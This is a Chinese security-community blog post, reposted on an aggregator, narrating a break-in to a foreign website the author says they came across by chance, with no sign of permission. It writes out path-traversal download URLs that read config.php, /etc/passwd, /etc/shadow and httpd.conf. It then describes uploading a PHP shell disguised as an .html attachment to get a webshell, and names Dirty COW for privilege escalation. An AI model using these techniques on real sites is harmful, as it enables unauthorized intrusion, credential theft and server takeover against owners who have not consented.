一波三折の渗透!细心即无敌

admin
admin
admin
138635
文章
114
评论
2021年7月25日22:32:17评论276 views字数 1997阅读6分39秒阅读模式

本文作者:圈子社区-Y4er

首发于圈子社区,未经允许,禁止转载

https://www.secquan.org/Discuss/1069054 



常规操作


偶然的情况下得到了这个站,于是就测试了一番。


一波三折の渗透!细心即无敌


因为是国外的网站,英文机翻后的词看起来很有喜感。


一波三折の渗透!细心即无敌


习惯性先发文章,看看编辑器上传附件等地方是否有漏洞。


一波三折の渗透!细心即无敌


首先尝试编辑器处上传图片,经验告诉我越low的编辑器越好拿shell。


一波三折の渗透!细心即无敌


我错了,白名单+上传重命名,smarteditor编辑器,各种截断尝试,突破不了。


一波三折の渗透!细心即无敌


一波三折の渗透!细心即无敌


这编辑器无敌,随后发现另外三处均是调用此编辑器上传,换思路。


在已经发布的文章中发现绝对路径


http://xxx.com/download.php?dnfile=20190228_012000_0978115.jpg&file=/home/xxx/webapp/../public_html/upload_dir/board/16887879979878fa23f2.jpg


一波三折の渗透!细心即无敌


测试后发现public_html为根目录,决定挖挖注入,万一是root没降权就舒服了。


http://www.xxx.com/?module=xx&action=xx&iPopNo=1&seq_cd=1


经过手动加sqlmap测试,发现后台存在时间盲注,由于国外站点访问不稳定的原因,遂放弃,在后期getshell之后发现用户不是root并且权限死得很,为之庆幸并没有在此处浪费时间。


到此处思路死了。编辑器getshell无解,sql注入getshell卒。



陷入困境


我们之前爆出绝对路径的url访问后发现会自动下载


http://xxx.com/download.php?dnfile=20190228_012000_0978115.jpg&file=/home/xxx/webapp/../public_html/upload_dir/board/16887879979878fa23f2.jpg


存在任意文件下载吗?先构造一下尝试


http://xxx.com/download.php?dnfile=download.php&file=/home/xxx/webapp/../public_html/download.php


一波三折の渗透!细心即无敌


bingo!


一波三折の渗透!细心即无敌


存在任意文件下载,我们找下数据库配置文件


http://xxx.com/download.php?dnfile=config.php&file=/home/xxx/webapp/../public_html/index.php


index.php一般会引入数据库的config.php


一波三折の渗透!细心即无敌


重新构造


http://www.xxx.com/download.php?dnfile=config.php&file=/home/xxx/webapp/../public_html/../webapp/config.php


一波三折の渗透!细心即无敌


数据库配置get!后发现没开3306外链,思路断掉。


在这个时候我重新回头看这个任意文件下载,读一下敏感文件试试?


my.cnf


一波三折の渗透!细心即无敌


password被注释掉,无用。


/etc/passwd
/etc/shadow
/etc/profile


一波三折の渗透!细心即无敌


一波三折の渗透!细心即无敌


没发现有可用信息。

似乎又陷入了困境,应该放弃吗?

我打开浏览器,在地址栏输入了熟悉的地址:

"https://www.secquan.org"

对自己说,“圈子社区的男人永不言弃!



峰回路转


正当我思考时,脑海中灵光一闪:下载apache配置文件看看!


http://www.xxx.com/download.php?dnfile=1.php&file=/usr/local/apache/conf/httpd.conf


一波三折の渗透!细心即无敌


惊了!html可以被当作php文件!


于是我去编辑器中尝试上传这几种文件,仍以失败告终。


但是附件的我们还没试!


一波三折の渗透!细心即无敌


抓包改后缀,返回文章查看路径


http://www.xxx.com/download.php?dnfile=php.jpg.html&file=/home/xxx/webapp/../public_html/upload_dir/board/13303476456487546a3cd.html


拼接


http://www.xxx.com/upload_dir/board/13303476456487546a3cd.html


一波三折の渗透!细心即无敌


getshell!!!


后面的就不说了,提权就是脏牛+bypass disablefunc一条龙,没啥亮点。


一波三折の渗透!细心即无敌



关于圈子社区


圈子社区是一个非盈利,封闭的白帽子技术交流社区。目前成员已有近2000人,拥有业内首个自主研发的实战化靶场,体系化学习和燃爆的交流气氛带你成为真正的大佬,社区专注实战,崇尚技术,如果你也是实战派,请关注我们。
社区地址:(请使用https访问)
https://www.secquan.org

一波三折の渗透!细心即无敌


本文始发于微信公众号(Secquan圈子社区):一波三折の渗透!细心即无敌

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年7月25日22:32:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一波三折の渗透!细心即无敌https://cn-sec.com/archives/355424.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息